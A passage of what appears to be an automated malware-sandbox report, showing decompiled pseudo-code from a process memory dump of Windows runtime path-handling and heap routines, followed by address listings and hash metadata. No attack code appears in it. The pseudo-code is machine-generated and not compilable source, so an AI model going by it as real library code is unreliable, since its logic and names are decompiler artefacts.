                                                                                      												 *(_t528 - 0xa2) = _t392;
                                                                                      												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                      												__eflags = _t469;
                                                                                      												while(1) {
                                                                                      													 *(_t528 - 0xe4) = _t511;
                                                                                      													__eflags = _t392;
                                                                                      													_t393 = _t427;
                                                                                      													if(_t392 != 0) {
                                                                                      														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                      													}
                                                                                      													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                      													__eflags = _t395;
                                                                                      													if(_t395 == 0) {
                                                                                      														_t511 = _t511 +  *_t469;
                                                                                      														__eflags = _t511;
                                                                                      													} else {
                                                                                      														_t398 = _t395 - 1;
                                                                                      														__eflags = _t398;
                                                                                      														if(_t398 == 0) {
                                                                                      															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                      															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                      														} else {
                                                                                      															__eflags = _t398 == 1;
                                                                                      															if(_t398 == 1) {
                                                                                      																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                      																_t402 =  *_t469 & 0x0000ffff;
                                                                                      																 *(_t528 - 0xac) = _t402;
                                                                                      																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                      													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                      														break;
                                                                                      													}
                                                                                      													_t397 =  *(_t528 - 0x88) + 1;
                                                                                      													 *(_t528 - 0x88) = _t397;
                                                                                      													_t469 = _t469 + 0x10;
                                                                                      													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                      													_t392 =  *(_t528 - 0xa2);
                                                                                      													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                      														continue;
                                                                                      													}
                                                                                      													goto L45;
                                                                                      												}
                                                                                      												_t475 = 0x216;
                                                                                      												 *(_t528 - 0x74) = 0x216;
                                                                                      												goto L45;
                                                                                      											}
                                                                                      										} else {
                                                                                      											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                      											goto L16;
                                                                                      										}
                                                                                      									}
                                                                                      									_t491 = E01884CAB(_t306, _t528 - 0xa4);
                                                                                      									 *(_t528 - 0x74) = _t491;
                                                                                      									__eflags = _t491;
                                                                                      									if(_t491 != 0) {
                                                                                      										goto L91;
                                                                                      									} else {
                                                                                      										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                      										goto L20;
                                                                                      									}
                                                                                      								}
                                                                                      								L16:
                                                                                      								 *(_t528 - 0x74) = 0x1069;
                                                                                      								L93:
                                                                                      								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                      								 *(_t528 - 0xd0) = _t298;
                                                                                      								_t474 = _t474 + _t511;
                                                                                      								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                      								_t494 = 4;
                                                                                      								__eflags = _t298 - _t494;
                                                                                      								if(_t298 >= _t494) {
                                                                                      									goto L100;
                                                                                      								}
                                                                                      								_t494 =  *(_t528 - 0xcc);
                                                                                      								_t435 = _t298;
                                                                                      								continue;
                                                                                      							}
                                                                                      							__eflags = _t494[2] | _t494[3];
                                                                                      							if((_t494[2] | _t494[3]) == 0) {
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						__eflags = _t301;
                                                                                      						if(_t301 != 0) {
                                                                                      							goto L92;
                                                                                      						}
                                                                                      						goto L10;
                                                                                      						L92:
                                                                                      						goto L93;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_push(0x57);
                                                                                      					L101:
                                                                                      					return E0180D130(_t427, _t494, _t511);
                                                                                      				}
                                                                                      			}

                                                                                      0x018860a4
                                                                                      0x018860ae
                                                                                      0x018860b0
                                                                                      0x018860b3
                                                                                      0x018860b6
                                                                                      0x018860b8
                                                                                      0x018860ba
                                                                                      0x018860ba
                                                                                      0x018860ba
                                                                                      0x018860ba
                                                                                      0x018860be
                                                                                      0x018860c0
                                                                                      0x018860c5
                                                                                      0x018860c5
                                                                                      0x018860c5
                                                                                      0x018860c6
                                                                                      0x018860cd
                                                                                      0x01886114
                                                                                      0x018860cf
                                                                                      0x018860cf
                                                                                      0x018860d4
                                                                                      0x018860d5
                                                                                      0x018860da
                                                                                      0x018860db
                                                                                      0x018860e1
                                                                                      0x018860e2
                                                                                      0x018860e8
                                                                                      0x018860f8
                                                                                      0x018860fd
                                                                                      0x018860fe
                                                                                      0x01886102
                                                                                      0x01886104
                                                                                      0x01886107
                                                                                      0x01886109
                                                                                      0x0188610b
                                                                                      0x0188610b
                                                                                      0x0188610b
                                                                                      0x0188610b
                                                                                      0x0188610f
                                                                                      0x0188610f
                                                                                      0x01886117
                                                                                      0x0188611a
                                                                                      0x0188611f
                                                                                      0x01886125
                                                                                      0x01886134
                                                                                      0x01886139
                                                                                      0x0188613f
                                                                                      0x01886146
                                                                                      0x01886148
                                                                                      0x0188614b
                                                                                      0x0188614d
                                                                                      0x0188614f
                                                                                      0x0188614f
                                                                                      0x0188614f
                                                                                      0x0188614f
                                                                                      0x01886153
                                                                                      0x01886159
                                                                                      0x01886159
                                                                                      0x0188615c
                                                                                      0x01886163
                                                                                      0x01886169
                                                                                      0x0188616c
                                                                                      0x01886172
                                                                                      0x01886181
                                                                                      0x01886186
                                                                                      0x01886187
                                                                                      0x0188618b
                                                                                      0x01886191
                                                                                      0x01886195
                                                                                      0x018861a3
                                                                                      0x018861bb
                                                                                      0x018861c0
                                                                                      0x018861c3
                                                                                      0x018861cc
                                                                                      0x018861d0
                                                                                      0x018861dc
                                                                                      0x018861de
                                                                                      0x018861e1
                                                                                      0x018861e4
                                                                                      0x018861e6
                                                                                      0x018861e8
                                                                                      0x018861e8
                                                                                      0x018861e8
                                                                                      0x018861e8
                                                                                      0x018861e6
                                                                                      0x018861ec
                                                                                      0x018861f3
                                                                                      0x01886203
                                                                                      0x01886209
                                                                                      0x0188620a
                                                                                      0x01886216
                                                                                      0x0188621d
                                                                                      0x01886227
                                                                                      0x01886241
                                                                                      0x01886246
                                                                                      0x0188624c
                                                                                      0x01886257
                                                                                      0x01886259
                                                                                      0x0188625c
                                                                                      0x0188625e
                                                                                      0x01886260
                                                                                      0x01886260
                                                                                      0x01886260
                                                                                      0x01886260
                                                                                      0x0188625e
                                                                                      0x01886264
                                                                                      0x01886267
                                                                                      0x01886269
                                                                                      0x01886315
                                                                                      0x01886315
                                                                                      0x0188631b
                                                                                      0x0188631e
                                                                                      0x01886324
                                                                                      0x01886327
                                                                                      0x0188632f
                                                                                      0x01886330
                                                                                      0x01886333
                                                                                      0x0188633a
                                                                                      0x0188633c
                                                                                      0x01886335
                                                                                      0x01886335
                                                                                      0x01886335
                                                                                      0x0188633f
                                                                                      0x01886342
                                                                                      0x0188634c
                                                                                      0x01886352
                                                                                      0x01886355
                                                                                      0x01886355
                                                                                      0x01886359
                                                                                      0x00000000
                                                                                      0x0188626f
                                                                                      0x01886275
                                                                                      0x01886275
                                                                                      0x01886278
                                                                                      0x0188627e
                                                                                      0x0188627e
                                                                                      0x01886281
                                                                                      0x01886287
                                                                                      0x0188628d
                                                                                      0x01886298
                                                                                      0x0188629c
                                                                                      0x018862a2
                                                                                      0x0188629e
                                                                                      0x0188629e
                                                                                      0x0188629e
                                                                                      0x018862a7
                                                                                      0x018862a7
                                                                                      0x018862aa
                                                                                      0x018862b0
                                                                                      0x018862f0
                                                                                      0x018862f0
                                                                                      0x018862f2
                                                                                      0x018862f8
                                                                                      0x018862fd
                                                                                      0x018862b2
                                                                                      0x018862b2
                                                                                      0x018862b2
                                                                                      0x018862b5
                                                                                      0x018862dd
                                                                                      0x018862e2
                                                                                      0x018862e5
                                                                                      0x018862b7
                                                                                      0x018862b8
                                                                                      0x018862bb
                                                                                      0x018862bd
                                                                                      0x018862c0
                                                                                      0x018862c4
                                                                                      0x018862cd
                                                                                      0x018862cd
                                                                                      0x018862c0
                                                                                      0x018862bb
                                                                                      0x018862b5
                                                                                      0x01886302
                                                                                      0x01886303
                                                                                      0x01886305
                                                                                      0x01886305
                                                                                      0x01886305
                                                                                      0x0188630c
                                                                                      0x0188630c
                                                                                      0x00000000
                                                                                      0x0188627e
                                                                                      0x01886269
                                                                                      0x01885eac
                                                                                      0x01885ebb
                                                                                      0x01885ebe
                                                                                      0x01885ecb
                                                                                      0x01885ecb
                                                                                      0x01885ece
                                                                                      0x01885ece
                                                                                      0x01885ed4
                                                                                      0x01885ed7
                                                                                      0x01885ed9
                                                                                      0x01885edb
                                                                                      0x01885edb
                                                                                      0x01885ee1
                                                                                      0x01885ee1
                                                                                      0x01885ee3
                                                                                      0x01885f20
                                                                                      0x01885f20
                                                                                      0x01885ee5
                                                                                      0x01885ee5
                                                                                      0x01885ee5
                                                                                      0x01885ee8
                                                                                      0x01885f11
                                                                                      0x01885f18
                                                                                      0x01885eea
                                                                                      0x01885eea
                                                                                      0x01885eed
                                                                                      0x01885ef2
                                                                                      0x01885ef8
                                                                                      0x01885efb
                                                                                      0x01885f0a
                                                                                      0x01885f0a
                                                                                      0x01885eed
                                                                                      0x01885ee8
                                                                                      0x01885f22
                                                                                      0x01885f28
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01885f30
                                                                                      0x01885f31
                                                                                      0x01885f37
                                                                                      0x01885f3a
                                                                                      0x01885f3d
                                                                                      0x01885f44
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01885f46
                                                                                      0x01885f48
                                                                                      0x01885f4d
                                                                                      0x00000000
                                                                                      0x01885f4d
                                                                                      0x01885dda
                                                                                      0x01885ddf
                                                                                      0x00000000
                                                                                      0x01885ddf
                                                                                      0x01885dd8
                                                                                      0x01885da7
                                                                                      0x01885da9
                                                                                      0x01885dac
                                                                                      0x01885dae
                                                                                      0x00000000
                                                                                      0x01885db4
                                                                                      0x01885db4
                                                                                      0x00000000
                                                                                      0x01885db4
                                                                                      0x01885dae
                                                                                      0x01885d88
                                                                                      0x01885d8d
                                                                                      0x01886363
                                                                                      0x01886369
                                                                                      0x0188636a
                                                                                      0x01886370
                                                                                      0x01886372
                                                                                      0x0188637a
                                                                                      0x0188637b
                                                                                      0x0188637d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0188637f
                                                                                      0x01886385
                                                                                      0x00000000
                                                                                      0x01886385
                                                                                      0x01885d38
                                                                                      0x01885d3b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01885d3b
                                                                                      0x01885d27
                                                                                      0x01885d29
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01886360
                                                                                      0x00000000
                                                                                      0x01886360
                                                                                      0x01885c10
                                                                                      0x01885c10
                                                                                      0x018863da
                                                                                      0x018863e5
                                                                                      0x018863e5

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41a4462313070e2086366ffcef33ff86b7b3da2553ec6fd5a6f4b0de58617201
                                                                                      • Instruction ID: 2a60737e5b291ac00c92e75d7364ebaba2a014014490ff1b3586fa79455c4219
                                                                                      • Opcode Fuzzy Hash: 41a4462313070e2086366ffcef33ff86b7b3da2553ec6fd5a6f4b0de58617201
                                                                                      • Instruction Fuzzy Hash: E7422B75900229CFDB24DF68C880BA9BBB1FF45304F1581AAD94DEB342E774AA85CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E017D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                      				signed int _v8;
                                                                                      				void* _v20;
                                                                                      				signed int _v24;
                                                                                      				char _v532;
                                                                                      				char _v540;
                                                                                      				signed short _v544;
                                                                                      				signed int _v548;
                                                                                      				signed short* _v552;
                                                                                      				signed short _v556;
                                                                                      				signed short* _v560;
                                                                                      				signed short* _v564;
                                                                                      				signed short* _v568;
                                                                                      				void* _v570;
                                                                                      				signed short* _v572;
                                                                                      				signed short _v576;
                                                                                      				signed int _v580;
                                                                                      				char _v581;
                                                                                      				void* _v584;
                                                                                      				unsigned int _v588;
                                                                                      				signed short* _v592;
                                                                                      				void* _v597;
                                                                                      				void* _v600;
                                                                                      				void* _v604;
                                                                                      				void* _v609;
                                                                                      				void* _v616;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				unsigned int _t161;
                                                                                      				signed int _t162;
                                                                                      				unsigned int _t163;
                                                                                      				void* _t169;
                                                                                      				signed short _t173;
                                                                                      				signed short _t177;
                                                                                      				signed short _t181;
                                                                                      				unsigned int _t182;
                                                                                      				signed int _t185;
                                                                                      				signed int _t213;
                                                                                      				signed int _t225;
                                                                                      				short _t233;
                                                                                      				signed char _t234;
                                                                                      				signed int _t242;
                                                                                      				signed int _t243;
                                                                                      				signed int _t244;
                                                                                      				signed int _t245;
                                                                                      				signed int _t250;
                                                                                      				void* _t251;
                                                                                      				signed short* _t254;
                                                                                      				void* _t255;
                                                                                      				signed int _t256;
                                                                                      				void* _t257;
                                                                                      				signed short* _t260;
                                                                                      				signed short _t265;
                                                                                      				signed short* _t269;
                                                                                      				signed short _t271;
                                                                                      				signed short** _t272;
                                                                                      				signed short* _t275;
                                                                                      				signed short _t282;
                                                                                      				signed short _t283;
                                                                                      				signed short _t290;
                                                                                      				signed short _t299;
                                                                                      				signed short _t307;
                                                                                      				signed int _t308;
                                                                                      				signed short _t311;
                                                                                      				signed short* _t315;
                                                                                      				signed short _t316;
                                                                                      				void* _t317;
                                                                                      				void* _t319;
                                                                                      				signed short* _t321;
                                                                                      				void* _t322;
                                                                                      				void* _t323;
                                                                                      				unsigned int _t324;
                                                                                      				signed int _t325;
                                                                                      				void* _t326;
                                                                                      				signed int _t327;
                                                                                      				signed int _t329;
                                                                                      
                                                                                      				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                      				_v8 =  *0x18ad360 ^ _t329;
                                                                                      				_t157 = _a8;
                                                                                      				_t321 = _a4;
                                                                                      				_t315 = __edx;
                                                                                      				_v548 = __ecx;
                                                                                      				_t305 = _a20;
                                                                                      				_v560 = _a12;
                                                                                      				_t260 = _a16;
                                                                                      				_v564 = __edx;
                                                                                      				_v580 = _a8;
                                                                                      				_v572 = _t260;
                                                                                      				_v544 = _a20;
                                                                                      				if( *__edx <= 8) {
                                                                                      					L3:
                                                                                      					if(_t260 != 0) {
                                                                                      						 *_t260 = 0;
                                                                                      					}
                                                                                      					_t254 =  &_v532;
                                                                                      					_v588 = 0x208;
                                                                                      					if((_v548 & 0x00000001) != 0) {
                                                                                      						_v556 =  *_t315;
                                                                                      						_v552 = _t315[2];
                                                                                      						_t161 = E017EF232( &_v556);
                                                                                      						_t316 = _v556;
                                                                                      						_v540 = _t161;
                                                                                      						goto L17;
                                                                                      					} else {
                                                                                      						_t306 = 0x208;
                                                                                      						_t298 = _t315;
                                                                                      						_t316 = E017D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                      						if(_t316 == 0) {
                                                                                      							L68:
                                                                                      							_t322 = 0xc0000033;
                                                                                      							goto L39;
                                                                                      						} else {
                                                                                      							while(_v581 == 0) {
                                                                                      								_t233 = _v588;
                                                                                      								if(_t316 > _t233) {
                                                                                      									_t234 = _v548;
                                                                                      									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                      										_t254 = L017D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                      										if(_t254 == 0) {
                                                                                      											_t169 = 0xc0000017;
                                                                                      										} else {
                                                                                      											_t298 = _v564;
                                                                                      											_v588 = _t316;
                                                                                      											_t306 = _t316;
                                                                                      											_t316 = E017D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                      											if(_t316 != 0) {
                                                                                      												continue;
                                                                                      											} else {
                                                                                      												goto L68;
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										goto L90;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_v556 = _t316;
                                                                                      									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                      									_v552 = _t254;
                                                                                      									if(_t316 < 2) {
                                                                                      										L11:
                                                                                      										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                      											_t161 = 5;
                                                                                      										} else {
                                                                                      											if(_t316 < 6) {
                                                                                      												L87:
                                                                                      												_t161 = 3;
                                                                                      											} else {
                                                                                      												_t242 = _t254[2] & 0x0000ffff;
                                                                                      												if(_t242 != 0x5c) {
                                                                                      													if(_t242 == 0x2f) {
                                                                                      														goto L16;
                                                                                      													} else {
                                                                                      														goto L87;
                                                                                      													}
                                                                                      													goto L101;
                                                                                      												} else {
                                                                                      													L16:
                                                                                      													_t161 = 2;
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										_t243 =  *_t254 & 0x0000ffff;
                                                                                      										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                      											if(_t316 < 4) {
                                                                                      												L81:
                                                                                      												_t161 = 4;
                                                                                      												goto L17;
                                                                                      											} else {
                                                                                      												_t244 = _t254[1] & 0x0000ffff;
                                                                                      												if(_t244 != 0x5c) {
                                                                                      													if(_t244 == 0x2f) {
                                                                                      														goto L60;
                                                                                      													} else {
                                                                                      														goto L81;
                                                                                      													}
                                                                                      												} else {
                                                                                      													L60:
                                                                                      													if(_t316 < 6) {
                                                                                      														L83:
                                                                                      														_t161 = 1;
                                                                                      														goto L17;
                                                                                      													} else {
                                                                                      														_t245 = _t254[2] & 0x0000ffff;
                                                                                      														if(_t245 != 0x2e) {
                                                                                      															if(_t245 == 0x3f) {
                                                                                      																goto L62;
                                                                                      															} else {
                                                                                      																goto L83;
                                                                                      															}
                                                                                      														} else {
                                                                                      															L62:
                                                                                      															if(_t316 < 8) {
                                                                                      																L85:
                                                                                      																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                      																goto L17;
                                                                                      															} else {
                                                                                      																_t250 = _t254[3] & 0x0000ffff;
                                                                                      																if(_t250 != 0x5c) {
                                                                                      																	if(_t250 == 0x2f) {
                                                                                      																		goto L64;
                                                                                      																	} else {
                                                                                      																		goto L85;
                                                                                      																	}
                                                                                      																} else {
                                                                                      																	L64:
                                                                                      																	_t161 = 6;
                                                                                      																	goto L17;
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      											goto L101;
                                                                                      										} else {
                                                                                      											goto L11;
                                                                                      										}
                                                                                      									}
                                                                                      									L17:
                                                                                      									if(_t161 != 2) {
                                                                                      										_t162 = _t161 - 1;
                                                                                      										if(_t162 > 5) {
                                                                                      											goto L18;
                                                                                      										} else {
                                                                                      											switch( *((intOrPtr*)(_t162 * 4 +  &M017D45F8))) {
                                                                                      												case 0:
                                                                                      													_v568 = 0x1791078;
                                                                                      													__eax = 2;
                                                                                      													goto L20;
                                                                                      												case 1:
                                                                                      													goto L18;
                                                                                      												case 2:
                                                                                      													_t163 = 4;
                                                                                      													goto L19;
                                                                                      											}
                                                                                      										}
                                                                                      										goto L41;
                                                                                      									} else {
                                                                                      										L18:
                                                                                      										_t163 = 0;
                                                                                      										L19:
                                                                                      										_v568 = 0x17911c4;
                                                                                      									}
                                                                                      									L20:
                                                                                      									_v588 = _t163;
                                                                                      									_v564 = _t163 + _t163;
                                                                                      									_t306 =  *_v568 & 0x0000ffff;
                                                                                      									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                      									_v576 = _t265;
                                                                                      									if(_t265 > 0xfffe) {
                                                                                      										L90:
                                                                                      										_t322 = 0xc0000106;
                                                                                      									} else {
                                                                                      										if(_t321 != 0) {
                                                                                      											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                      												if(_v580 != 0) {
                                                                                      													goto L23;
                                                                                      												} else {
                                                                                      													_t322 = 0xc0000106;
                                                                                      													goto L39;
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t177 = _t306;
                                                                                      												goto L25;
                                                                                      											}
                                                                                      											goto L101;
                                                                                      										} else {
                                                                                      											if(_v580 == _t321) {
                                                                                      												_t322 = 0xc000000d;
                                                                                      											} else {
                                                                                      												L23:
                                                                                      												_t173 = L017D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                      												_t269 = _v592;
                                                                                      												_t269[2] = _t173;
                                                                                      												if(_t173 == 0) {
                                                                                      													_t322 = 0xc0000017;
                                                                                      												} else {
                                                                                      													_t316 = _v556;
                                                                                      													 *_t269 = 0;
                                                                                      													_t321 = _t269;
                                                                                      													_t269[1] = _v576;
                                                                                      													_t177 =  *_v568 & 0x0000ffff;
                                                                                      													L25:
                                                                                      													_v580 = _t177;
                                                                                      													if(_t177 == 0) {
                                                                                      														L29:
                                                                                      														_t307 =  *_t321 & 0x0000ffff;
                                                                                      													} else {
                                                                                      														_t290 =  *_t321 & 0x0000ffff;
                                                                                      														_v576 = _t290;
                                                                                      														_t310 = _t177 & 0x0000ffff;
                                                                                      														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                      															_t307 =  *_t321 & 0xffff;
                                                                                      														} else {
                                                                                      															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                      															E017FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                      															_t329 = _t329 + 0xc;
                                                                                      															_t311 = _v580;
                                                                                      															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                      															 *_t321 = _t225;
                                                                                      															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                      																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                      															}
                                                                                      															goto L29;
                                                                                      														}
                                                                                      													}
                                                                                      													_t271 = _v556 - _v588 + _v588;
                                                                                      													_v580 = _t307;
                                                                                      													_v576 = _t271;
                                                                                      													if(_t271 != 0) {
                                                                                      														_t308 = _t271 & 0x0000ffff;
                                                                                      														_v588 = _t308;
                                                                                      														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                      															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                      															E017FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                      															_t329 = _t329 + 0xc;
                                                                                      															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                      															 *_t321 = _t213;
                                                                                      															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                      																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      													_t272 = _v560;
                                                                                      													if(_t272 != 0) {
                                                                                      														 *_t272 = _t321;
                                                                                      													}
                                                                                      													_t306 = 0;
                                                                                      													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                      													_t275 = _v572;
                                                                                      													if(_t275 != 0) {
                                                                                      														_t306 =  *_t275;
                                                                                      														if(_t306 != 0) {
                                                                                      															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                      														}
                                                                                      													}
                                                                                      													_t181 = _v544;
                                                                                      													if(_t181 != 0) {
                                                                                      														 *_t181 = 0;
                                                                                      														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                      														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                      														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                      														if(_v540 == 5) {
                                                                                      															_t182 = E017B52A5(1);
                                                                                      															_v588 = _t182;
                                                                                      															if(_t182 == 0) {
                                                                                      																E017CEB70(1, 0x18a79a0);
                                                                                      																goto L38;
                                                                                      															} else {
                                                                                      																_v560 = _t182 + 0xc;
                                                                                      																_t185 = E017CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                      																if(_t185 == 0) {
                                                                                      																	_t324 = _v588;
                                                                                      																	goto L97;
                                                                                      																} else {
                                                                                      																	_t306 = _v544;
                                                                                      																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                      																	 *(_t306 + 4) = _t282;
                                                                                      																	_v576 = _t282;
                                                                                      																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                      																	 *_t306 = _t325;
                                                                                      																	if( *_t282 == 0x5c) {
                                                                                      																		_t149 = _t325 - 2; // -2
                                                                                      																		_t283 = _t149;
                                                                                      																		 *_t306 = _t283;
                                                                                      																		 *(_t306 + 4) = _v576 + 2;
                                                                                      																		_t185 = _t283 & 0x0000ffff;
                                                                                      																	}
                                                                                      																	_t324 = _v588;
                                                                                      																	 *(_t306 + 2) = _t185;
                                                                                      																	if((_v548 & 0x00000002) == 0) {
                                                                                      																		L97:
                                                                                      																		asm("lock xadd [esi], eax");
                                                                                      																		if((_t185 | 0xffffffff) == 0) {
                                                                                      																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                      																			E017F95D0();
                                                                                      																			L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                      																		}
                                                                                      																	} else {
                                                                                      																		 *(_t306 + 0xc) = _t324;
                                                                                      																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                      																	}
                                                                                      																	goto L38;
                                                                                      																}
                                                                                      															}
                                                                                      															goto L41;
                                                                                      														}
                                                                                      													}
                                                                                      													L38:
                                                                                      													_t322 = 0;
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      									L39:
                                                                                      									if(_t254 !=  &_v532) {
                                                                                      										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                      									}
                                                                                      									_t169 = _t322;
                                                                                      								}
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							goto L68;
                                                                                      						}
                                                                                      					}
                                                                                      					L41:
                                                                                      					_pop(_t317);
                                                                                      					_pop(_t323);
                                                                                      					_pop(_t255);
                                                                                      					return E017FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                      				} else {
                                                                                      					_t299 = __edx[2];
                                                                                      					if( *_t299 == 0x5c) {
                                                                                      						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                      						if(_t256 != 0x5c) {
                                                                                      							if(_t256 != 0x3f) {
                                                                                      								goto L2;
                                                                                      							} else {
                                                                                      								goto L50;
                                                                                      							}
                                                                                      						} else {
                                                                                      							L50:
                                                                                      							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                      								goto L2;
                                                                                      							} else {
                                                                                      								_t251 = E017F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                      								_pop(_t319);
                                                                                      								_pop(_t326);
                                                                                      								_pop(_t257);
                                                                                      								return E017FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						L2:
                                                                                      						_t260 = _v572;
                                                                                      						goto L3;
                                                                                      					}
                                                                                      				}
                                                                                      				L101:
                                                                                      			}
                                                                                      0x017d425f
                                                                                      0x017d426e
                                                                                      0x017d4270
                                                                                      0x017d427a
                                                                                      0x0181e219
                                                                                      0x0181e219
                                                                                      0x017d4280
                                                                                      0x017d4282
                                                                                      0x017d4456
                                                                                      0x017d45ea
                                                                                      0x00000000
                                                                                      0x017d45f0
                                                                                      0x0181e223
                                                                                      0x00000000
                                                                                      0x0181e223
                                                                                      0x017d445c
                                                                                      0x017d445c
                                                                                      0x00000000
                                                                                      0x017d445c
                                                                                      0x00000000
                                                                                      0x017d4288
                                                                                      0x017d428c
                                                                                      0x0181e298
                                                                                      0x017d4292
                                                                                      0x017d4292
                                                                                      0x017d429e
                                                                                      0x017d42a3
                                                                                      0x017d42a7
                                                                                      0x017d42ac
                                                                                      0x0181e22d
                                                                                      0x017d42b2
                                                                                      0x017d42b2
                                                                                      0x017d42b9
                                                                                      0x017d42bc
                                                                                      0x017d42c2
                                                                                      0x017d42ca
                                                                                      0x017d42cd
                                                                                      0x017d42cd
                                                                                      0x017d42d4
                                                                                      0x017d433f
                                                                                      0x017d433f
                                                                                      0x017d42d6
                                                                                      0x017d42d6
                                                                                      0x017d42d9
                                                                                      0x017d42dd
                                                                                      0x017d42eb
                                                                                      0x0181e23a
                                                                                      0x017d42f1
                                                                                      0x017d4305
                                                                                      0x017d430d
                                                                                      0x017d4315
                                                                                      0x017d4318
                                                                                      0x017d431f
                                                                                      0x017d4322
                                                                                      0x017d432e
                                                                                      0x017d433b
                                                                                      0x017d433b
                                                                                      0x00000000
                                                                                      0x017d432e
                                                                                      0x017d42eb
                                                                                      0x017d434c
                                                                                      0x017d434e
                                                                                      0x017d4352
                                                                                      0x017d4359
                                                                                      0x017d435e
                                                                                      0x017d4361
                                                                                      0x017d436e
                                                                                      0x017d438a
                                                                                      0x017d438e
                                                                                      0x017d4396
                                                                                      0x017d439e
